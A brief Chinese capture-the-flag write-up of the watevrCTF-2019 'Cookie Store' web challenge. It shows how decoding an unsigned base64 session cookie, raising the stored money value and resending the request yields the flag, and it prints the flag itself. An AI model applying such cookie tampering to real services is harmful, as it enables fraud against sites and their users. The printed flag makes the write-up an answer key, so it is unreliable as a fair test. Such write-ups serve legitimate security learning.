Web|[watevrCTF-2019]Cookie Store
需要购买flag cookie即可得到flag,但是金额不足,使用burp suite抓包
Cookie: session=eyJtb25leSI6IDUwLCAiaGlzdG9yeSI6IFtdfQ==
看到cookie像是base64编码后的数据,解码查看
{"money": 50, "history": []}
所以金额藏在cookie中,更改金额大于100,编码后重新发包
在响应包中有session
eyJtb25leSI6IDUwLCAiaGlzdG9yeSI6IFsiZmxhZ3swYzU5MDNjZC0xMzgyLTQyYzEtYjUyNC05NTYwNDNmYjE2MzN9XG4iXX0=
base64解码
{"money": 50, "history": ["flag{0c5903cd-1382-42c1-b524-956043fb1633}\n"]}
flag{0c5903cd-1382-42c1-b524-956043fb1633}
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步